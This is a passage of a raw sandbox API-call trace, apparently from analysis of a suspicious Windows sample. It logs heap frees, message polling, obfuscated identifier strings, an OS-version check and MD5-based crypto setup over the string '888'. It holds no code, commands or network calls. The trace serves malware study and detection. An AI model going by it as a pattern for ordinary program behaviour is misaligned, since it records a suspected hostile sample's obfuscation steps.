lpsz="A1A0070620F") returned 0xb [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.384] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.384] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.384] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0122.384] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.384] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.385] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.385] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.385] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.385] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.385] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.386] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.386] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0122.386] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.386] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.386] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.386] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.386] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.386] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0122.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0122.386] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.387] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.387] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.387] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.387] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.387] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7000, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.387] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf088) returned 1 [0122.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.388] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0122.388] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.388] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0122.388] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.388] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.388] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.388] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.388] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.388] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.388] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.388] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.389] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0122.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.389] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0122.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.389] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.389] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.389] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.389] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.389] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.389] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.389] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.389] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.389] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.390] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.390] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.390] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.390] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.390] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.390] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.390] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.390] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.390] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.390] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.390] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.390] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.390] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.390] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.390] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.390] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.390] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.390] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.390] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.390] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa258, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.391] CryptCreateHash (in: hProv=0x9bf088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0122.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0122.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0122.391] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0122.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0122.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0122.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.391] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.391] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.391] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.391] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 